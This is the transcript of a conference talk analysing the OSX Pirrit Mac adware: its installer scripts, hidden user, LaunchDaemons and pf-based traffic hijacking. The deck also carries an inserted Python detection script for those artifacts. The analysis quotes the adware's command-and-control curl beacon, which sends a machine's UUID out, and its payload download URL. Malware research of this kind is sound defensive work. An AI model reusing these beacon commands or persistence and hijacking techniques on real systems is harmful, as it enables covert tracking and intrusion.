Adware isn’t taken seriously, especially threats targeting Macs. But OSX Pirrit, which can obtain root access and has components found in malware, shows that adware can become a huge security issue. Amit Serper will explain how OSX Pirrit works, why security professionals may want to rethink how commodity threats are handled and why Macs aren’t as secure as people think.
(Source: RSA Conference USA 2017)
3. #RSAC
$ whoami
• Amit Serper (What’s with the weird name, dude?)
• Principal security researcher @ Cybereason
Low level research (Kernel, reversing, etc...)
Writing poorly programmed attack simulation tools (crappy coder)
Malware research
HackingTeam server research (with @awfrazer):
Slides: http://hackedteam.lol
Paper: http://ht-paper.amit.wtf
Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf
Lead security researcher @ Israeli government agency (9 years)
<REDACTED>
Follow me on twitter: @0xAmit
4. #RSAC
$ cat /Users/amit/agenda.txt
1. For those that weren’t around 15 years ago: Intro to adware
2. This apple is getting ripe: Adware on Mac
3. OSX.Pirrit
4. How they messed up
5. #RSAC
Intro to Adware
• Adware usually gets onto your machine via installers.
• These installers install the program you downloaded and then offer to add some
other program that will "enhance your experience"
6. #RSAC
Intro to Adware
1. Software that resides on one's machine and displays ads
2. Adware divides into several categories:
• Plain and stupid – just displays popups without any context
• The "norm" – displays banners (and rarely popups) according to basic metrics
that are gathered from the browser
• The black-ops operative – installs a hidden program that can see your entire
traffic, injects ads into pages you visit and even overrides legitimate ads that
were put there in the first place (that's stealing!)
7. #RSAC
Adware on the Mac
1. Similar to Windows, adware on OS X usually comes in the form of
toolbars
2. These toolbars are Safari plugins – like Spigot…
8. #RSAC
Adware on the Mac
3. Spigot also installs LaunchAgents!
http://www.thesafemac.com/arg-spigot
9. #RSAC
The story begins…
• An IRC user, "Xiano", popped into #osxre @ freenode and told us that his
friend's Mac was acting weird
• He said that internet browsing was rather slow and some weird processes were
showing up.
• He then shared with us a weird executable called "sizzling".
• Another channel member, "Paraxor", started reversing that executable and
quoted some function names
• From those strings it was immediately clear that this was some sort of adware
11. #RSAC
Qt?
• Qt (pronounced cute) is a cross-platform application
development framework
• Allows a developer to maintain a single codebase for an
application that will run on Windows, Linux, Mac and other
platforms…
• The "cost" of that is a lot of external libraries that get
linked into your application
12. #RSAC
The story begins… (continued)
http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/
18. #RSAC
Let's google that URL…
http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1
Gives one result: a JoeSandbox analysis of a Windows PE executable
24. #RSAC
Xiano was back with more…
• He found an app bundle called “DemoUpdater”
on his friend’s machine.
• He mentioned that this app bundle was
running under a different user which he did not
know.
• Inside the app bundle was an x64 Mach-O binary
executable and a shell script called Update2.sh.
• This was far more interesting.
28. #RSAC
But what about that Update2.sh shell script?
• When the executable finishes running, it executes Update2.sh
• It's a HUGE script (330 lines) – it even has some inline Python code (python -c)
  • Gets the machine UUID via the command line (ioreg, parsing its huge output with awk and grep)
  • Sends the machine ID to a server in order to get a new ID back from the server, by issuing a curl
    command:
    curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"
  • Validates your geolocation by curl'ing ipinfo.io/country and checks that you are in the US, UK, Spain,
    Australia, France, Germany, India, Italy, the Netherlands or New Zealand, in order to download a different
    "ad package"
  • Updates the C&C, telling it that the installation was successful; it uses the UUID as the
    identifier
  • After the C&C has been notified, the script downloads and installs another program called
    "DemoInjector"
29. #RSAC
So here’s what we know until now
• It's adware
• It generates traffic
• It's cross-platform
• It's definitely trying to hide strings and domains inside the binary
• It adds a hidden user with a weird name – so it has to get root access
• It runs weird processes with strange names
• It has a component called "DemoUpdater"
33. #RSAC
PKG file?
• Mac equivalent of the MSI (installer file)
• An extensible archive format (XAR)
• Has a nice wizard with useful EULA messages
• Can be signed with a developer certificate
• Has the ability to run pre/post install scripts!
34. #RSAC
PKG file!
• Pkg files are a very convenient way to drop
malware
• You can codesign them
• And you can just use the scripting features to do
whatever you want to.
39. #RSAC
DemoUpdater
• DemoUpdater is the first component that's actually installed by Pirrit.
• This is the component that lays the groundwork for the traffic hijacking proxy
• This is the script that generates the strange names
• After a random name is generated, it is written to com.common.plist
• It then creates another plist to hold its preferences. That plist is created with a
random name on each install (com.<RANDOMWORD>.preferences.plist)
40. #RSAC
DemoUpdater
• The script then carries on with creating the DemoUpdater bundle and
executable, not forgetting to change its name to make detection harder
• It then downloads the next component, DemoInjector, and adds a
LaunchDaemon for it.
41. #RSAC
Wait… LaunchDaemons?
• A LaunchDaemon is an autorun in Mac speak
• It loads when the computer boots
• And just like everything in OS X, it’s also stored in a plist file
42. #RSAC
The soil is ready… Now – plant the seed
• After all of the basic building blocks have been laid, it is time for the main
event
• We have a random name generated for DemoUpdater
• We have an autorun set up for DemoUpdater
• Now it's time to get the proxy and get crackin'!
• The proxy is DemoInjector (remember it from before?)
• It will be downloaded from:
http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz
• The number in the tgz file name is incremental – each version gets the next number
• The latest version of DemoInjector is dit8 and it is from April 10th 2016.
43. #RSAC
The soil is ready… Now – plant the seed
• The proxy is called DemoInjector.
• It is also a QT project.
• It also has a lot of shell scripts!
• The most interesting one is install_injector.sh
• It also generates a random company name and
executable name
• And it creates a hidden user!
49. #RSAC
And now – Traffic redirection!
• DemoInjector is listening on 127.0.0.1:9882
• All of the packets that are generated by everyone but $HIDDEN_USERS are
forwarded to DemoInjector using pf
• These settings also exist in another file that is dropped by the installer, called
/etc/change_net_settings. There’s also a LaunchDaemon for that!
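Defender-side triage for the three host artifacts described on the slides above (the pf redirect to DemoInjector on 127.0.0.1:9882, the LaunchDaemon that runs /etc/change_net_settings, and the hidden user). This is an added example, not Cybereason's code or anything from the Pirrit samples; the pf rules, plist and dscl listing are constructed, and the account name and LaunchDaemon label are placeholders, since the real ones are random per install. On a Mac you would feed the functions the output of `pfctl -sn`, the files in /Library/LaunchDaemons and `dscl . -list /Users UniqueID`.

```python
import re
import plistlib

# Indicators named on the slides: DemoInjector's local proxy port and the net-settings script
PROXY_PORT = 9882
NET_SCRIPT = "/etc/change_net_settings"

def pf_rules_to_local_proxy(pf_rules, port=PROXY_PORT):
    """Return pf 'rdr' rules (as printed by `pfctl -sn`) that send traffic to 127.0.0.1:<port>."""
    pat = re.compile(r"\brdr\b.*->\s*127\.0\.0\.1\s+port\s+%d\b" % port)
    return [line.strip() for line in pf_rules.splitlines() if pat.search(line)]

def launchdaemon_reasons(plist_bytes):
    """Reasons a LaunchDaemon plist looks like a Pirrit component: it runs the
    net-settings script, or its program lives in a hidden (dot-prefixed) home directory."""
    job = plistlib.loads(plist_bytes)
    args = list(job.get("ProgramArguments", [])) + [job.get("Program", "")]
    reasons = []
    if any(NET_SCRIPT in a for a in args):
        reasons.append("runs " + NET_SCRIPT)
    if any(re.match(r"/Users/\.[^/]+/", a) for a in args):
        reasons.append("program lives in a hidden home directory")
    return reasons

def hidden_accounts(dscl_listing):
    """From `dscl . -list /Users UniqueID` output, return accounts hidden from the
    login window (UID below 500) that are not Apple's built-in or _service users."""
    hidden = []
    for line in dscl_listing.splitlines():
        parts = line.split()
        if len(parts) != 2 or not parts[1].lstrip("-").isdigit():
            continue
        name, uid = parts[0], int(parts[1])
        if uid < 500 and not name.startswith("_") and name not in ("root", "daemon", "nobody"):
            hidden.append(name)
    return hidden

# Constructed samples, not captured from a real host; account name and label are placeholders.
SAMPLE_PF = """rdr pass on lo0 inet proto tcp from any to any port 80 -> 127.0.0.1 port 9882
nat on en0 inet from 10.0.0.0/24 to any -> (en0)
"""
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.placeholder.netsettings</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>/etc/change_net_settings</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""
SAMPLE_DSCL = "root 0\n_spotlight 89\nnobody -2\namit 501\nzxqrvt 401\n"
```

The UID-below-500 heuristic relies on macOS hiding such accounts from the login window by default, so review any hit against the machine's known service accounts before acting on it.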
52. #RSAC
Uncovering the perpetrators
• Like all good things… it happened totally by accident!
• I had just got a fresh sample of another OSX/Pirrit installer
• As I was too lazy to disable the AV inside my OS X VM, I
decided that I should just list the files inside the
archive
56. #RSAC
Buzz is created!
• About 40 different papers/news sites covered OSX/Pirrit
• Including: ThreatPost, Ars Technica, SC Magazine and
more…
• All of them asked for TargetingEdge's response.
• None got it. Except one.
57. #RSAC
Calcalist – Israel's 'The Economist'
TargetingEdge’s response (translated from Hebrew):
“We’ve read Cybereason’s highly inaccurate PR report. Among many wrong
details that are weaved all across their report, it is important to note that the
code featured in CR’s report does not belong to TargetingEdge but to an
Eastern European company…”
Now, who do YOU believe?